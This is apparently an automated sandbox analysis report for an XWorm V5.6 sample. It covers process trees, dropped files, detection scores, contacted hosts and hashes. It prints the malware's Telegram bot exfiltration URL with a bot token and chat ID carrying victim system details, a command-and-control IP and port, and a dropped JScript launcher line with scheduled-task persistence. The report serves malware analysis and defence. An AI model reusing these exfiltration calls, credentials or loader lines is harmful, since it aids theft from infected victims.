                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544503 Sample: DA92phBHUS.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 53 api.telegram.org 2->53 55 nAtuEYczbaU.nAtuEYczbaU 2->55 57 206.23.85.13.in-addr.arpa 2->57 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 79 17 other signatures 2->79 10 DA92phBHUS.exe 18 2->10         started        12 wscript.exe 1 2->12         started        signatures3 77 Uses the Telegram API (likely for C&C communication) 53->77 process4 signatures5 15 cmd.exe 3 10->15         started        87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->87 19 ImageSyncProX.scr 12->19         started        process6 file7 51 C:\Users\user\AppData\Local\Temp\...\Dump.pif, PE32 15->51 dropped 63 Drops PE files with a suspicious file extension 15->63 65 Uses schtasks.exe or at.exe to add and modify task schedules 15->65 21 Dump.pif 5 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 45 C:\Users\user\AppData\...\ImageSyncProX.scr, PE32 21->45 dropped 47 C:\Users\user\AppData\...\ImageSyncProX.js, ASCII 21->47 dropped 49 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 21->49 dropped 81 Drops PE files with a suspicious file extension 21->81 83 Writes to foreign memory regions 21->83 85 Injects a PE file into a foreign processes 21->85 31 RegAsm.exe 15 2 21->31         started        35 cmd.exe 1 21->35         started        37 schtasks.exe 1 21->37         started        signatures11 process12 dnsIp13 59 api.telegram.org 149.154.167.220, 443, 64427 TELEGRAMRU United Kingdom 31->59 61 193.41.226.233, 2222, 64431 AVORODE unknown 31->61 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->67 69 Protects its processes via BreakOnTermination flag 31->69 39 conhost.exe 35->39         started        41 schtasks.exe 1 35->41         started        43 conhost.exe 37->43         started        signatures14 process15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DA92phBHUS.exe18%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr5%ReversingLabs
                C:\Users\user\AppData\Local\Temp\438799\Dump.pif5%ReversingLabs
                C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                		149.154.167.220
                		truetrue
                  		unknown
                  nAtuEYczbaU.nAtuEYczbaU
                  		unknown
                  		unknowntrue
                    		unknown
                    206.23.85.13.in-addr.arpa
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      193.41.226.233true
                        		unknown
                        https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6true
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.telegramRegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://www.autoitscript.com/autoit3/JDA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744485289.0000000000F09000.00000002.00000001.01000000.00000006.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, ImageSyncProX.scr, 00000012.00000002.1844874611.00000000003B9000.00000002.00000001.01000000.00000008.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drfalse
                              		unknown
                              http://nsis.sf.net/NSIS_ErrorErrorDA92phBHUS.exefalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgRegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://api.telegram.org/botDump.pif, 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://api.telegram.orgRegAsm.exe, 00000017.00000002.2973858744.000000000306C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.autoitscript.com/autoit3/DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.drfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUtrue
                                        193.41.226.233
                                        		unknownunknown
                                        		60548AVORODEtrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1544503
                                        Start date and time:2024-10-29 14:15:10 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 3s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:24
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:DA92phBHUS.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:649673218a19e8fd278c99d1355949f4.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@35/13@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 106
                                        • Number of non-executed functions: 291
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • VT rate limit hit for: DA92phBHUS.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        09:16:10API Interceptor1685x Sleep call for process: Dump.pif modified
                                        09:17:48API Interceptor15x Sleep call for process: RegAsm.exe modified
                                        13:16:11Task SchedulerRun new task: ImageSyncProX path: wscript s>//B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                          https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                            ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                              Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                  rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          Fedex.exeGet hashmaliciousAgentTeslaBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            api.telegram.orgZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            AVORODEnkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                            • 185.254.97.190
                                                            0vEj9ws1C4.exeGet hashmaliciousUnknownBrowse
                                                            • 185.254.97.190
                                                            hzUKkzHBqd.ps1Get hashmaliciousUnknownBrowse
                                                            • 185.254.97.190
                                                            1d686b05f745875e28939abe357baedd169b59f5a0d88.exeGet hashmaliciousQuasarBrowse
                                                            • 193.42.11.9
                                                            8cf0382f7f56bc86f6d5cf41a76b23d0cbc64dacf467b.exeGet hashmaliciousUnknownBrowse
                                                            • 193.42.11.9
                                                            8cf0382f7f56bc86f6d5cf41a76b23d0cbc64dacf467b.exeGet hashmaliciousUnknownBrowse
                                                            • 193.42.11.9
                                                            SecuriteInfo.com.Win64.MalwareX-gen.1457.25976.exeGet hashmaliciousUnknownBrowse
                                                            • 185.254.97.173
                                                            file.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                            • 45.152.46.72
                                                            wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                            • 45.152.46.72
                                                            nL4rzMSCVd.elfGet hashmaliciousMiraiBrowse
                                                            • 185.254.97.237

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            seemybestthingwhichigiventouformakebestappinesswogiven.htaGet hashmaliciousCobalt StrikeBrowse
                                                            • 149.154.167.220
                                                            greatevenevermadeforrgreatthignstogetinbacketothegreat.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            bestintercomthingswhichgivebestthingstogetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            seethebestthignswhichgivingbestthingstogetmakeuveryhappy.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            goodthingsbestviewtoseethebetterthingswithmygirlfriend.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            greatthingsalwayshappeningwithgreatattitudewithgoodnews.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            goodthingstoapprovethebestwaytounderstandhowmuchgood.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                            • 149.154.167.220

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Temp\438799\Dump.pifOkfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                                                              1XZFfxyWZA.exeGet hashmaliciousRedLineBrowse
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                  ZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                    1WDpq6mvnr.exeGet hashmaliciousUnknownBrowse
                                                                      1WDpq6mvnr.exeGet hashmaliciousUnknownBrowse
                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                              SecuriteInfo.com.Win32.Malware-gen.11524.25894.exeGet hashmaliciousUnknownBrowse
                                                                                C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrOkfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                                                                                  1XZFfxyWZA.exeGet hashmaliciousRedLineBrowse
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                      ZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        1WDpq6mvnr.exeGet hashmaliciousUnknownBrowse
                                                                                          1WDpq6mvnr.exeGet hashmaliciousUnknownBrowse
                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  SecuriteInfo.com.Win32.Malware-gen.11524.25894.exeGet hashmaliciousUnknownBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196
                                                                                                    Entropy (8bit):4.744509327530189
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:RiJBJHonwWDKaJkDDeVD1rjCywWDKaJkDDeVDd:YJ7QjWa5DtHWa5Dd
                                                                                                    MD5:909BB34BD1F7DB01AD95213F28823AF9
                                                                                                    SHA1:255C50CD7EBAC9746763C0A520579B5B9C595CAF
                                                                                                    SHA-256:CB1F67302E3A886C557B7922C2B3051D6031964D671B70B504AC6B145D20B826
                                                                                                    SHA-512:5DEF0EF8D15DAEEFEB3B3FEEA8B2E1EF18CC6C54D118155ADA3AF3FFFBE032E2572DAB5F67CE4C48B9AC1B2FDADC5D0C4F2AE998E37D025A3A14579FF93F8025
                                                                                                    Malicious:true
                                                                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ImageSyncPro Innovations Co\\ImageSyncProX.scr\" \"C:\\Users\\user\\AppData\\Local\\ImageSyncPro Innovations Co\\m\"")

                                                                                                    C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):893608
                                                                                                    Entropy (8bit):6.62028134425878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Okfjk1hs4kdhs2.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1XZFfxyWZA.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: ZnPyVAOUBc.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse
                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):224434
                                                                                                    Entropy (8bit):7.999153286358092
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:t3+D+6cImItj8aknXlll/tzfZHLc5E7D7qlqPYmzgAsVwVZhPlDxad4pE31eG5zf:IDhmlakFxqi7D7lgr6VZJJ/E1vr3z
                                                                                                    MD5:7C55F7CB1AF93F36A36462DAEB277E12
                                                                                                    SHA1:7997EC97A93B98E63B4297CCE8536AA5ACC4391F
                                                                                                    SHA-256:8A787B23BD5BEF3D04590F9B0FE65B2D8DD68B1239A8BF64B3B4F4F6A2ED0633
                                                                                                    SHA-512:482F6AA7D330F3B1647743C13792FEACA175A1A5DD5959241412F9EB89251FAAE5D4821591EC44B81E96565CE50A63ECEC91E35CC34AAB158EF09F05F6FABC01
                                                                                                    Malicious:false
                                                                                                    Preview:..b.oZ....S....}$...8..;..e/...f....!......Z..M....xg.bc4...^....=...\S..E.A..w.n.E5......;LX..mi..|..N`...!..0j.=..%.0do.]..n.../.....CYft._T.......zQv.H...(.J..5.\..v...x...A.b.p(5..C....P.L......U.8....q.Rl:S`!z.?.J.T.@..v.[....&.j...]....).2...oq..G.M....h.0T. &..]hqgH..M.)...G.m.."*..g.`......c....Hid<..~..7ib...8.hv~.x...7w{..r'4w%..._..(&z..'._.`...b..N...\.B-:.C.....hq..&.S>5W.pUG..V.\.c.L.,.$BW.t.]..X(..x'm{..l..Cm...{.hN\o...?,....-..i..h....F.....l..@^4n;_.t8 .?...D.E.A......z.a.P.Tpl.N.,`.L.%<....Q.&H....AY..:.|.2.B.....G*O..js...9)H.h...,p{.93T.....Z...m....H.z.C../......N..Y.......GN...<(ra8. ...Xp.e5..>..D. .K....(".f..X.......~E..........Q..c"....j....2..O(.9$............N..n...;..6.I.GX.....N...O.K~....=OA..0...X...f.V..s:.s@.v.j.`.t.......<K.D.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.K

                                                                                                    C:\Users\user\AppData\Local\Temp\438799\Dump.pif

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):893608
                                                                                                    Entropy (8bit):6.62028134425878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Okfjk1hs4kdhs2.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1XZFfxyWZA.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: ZnPyVAOUBc.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse
                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\438799\L

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):224434
                                                                                                    Entropy (8bit):7.999153286358092
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:t3+D+6cImItj8aknXlll/tzfZHLc5E7D7qlqPYmzgAsVwVZhPlDxad4pE31eG5zf:IDhmlakFxqi7D7lgr6VZJJ/E1vr3z
                                                                                                    MD5:7C55F7CB1AF93F36A36462DAEB277E12
                                                                                                    SHA1:7997EC97A93B98E63B4297CCE8536AA5ACC4391F
                                                                                                    SHA-256:8A787B23BD5BEF3D04590F9B0FE65B2D8DD68B1239A8BF64B3B4F4F6A2ED0633
                                                                                                    SHA-512:482F6AA7D330F3B1647743C13792FEACA175A1A5DD5959241412F9EB89251FAAE5D4821591EC44B81E96565CE50A63ECEC91E35CC34AAB158EF09F05F6FABC01
                                                                                                    Malicious:false
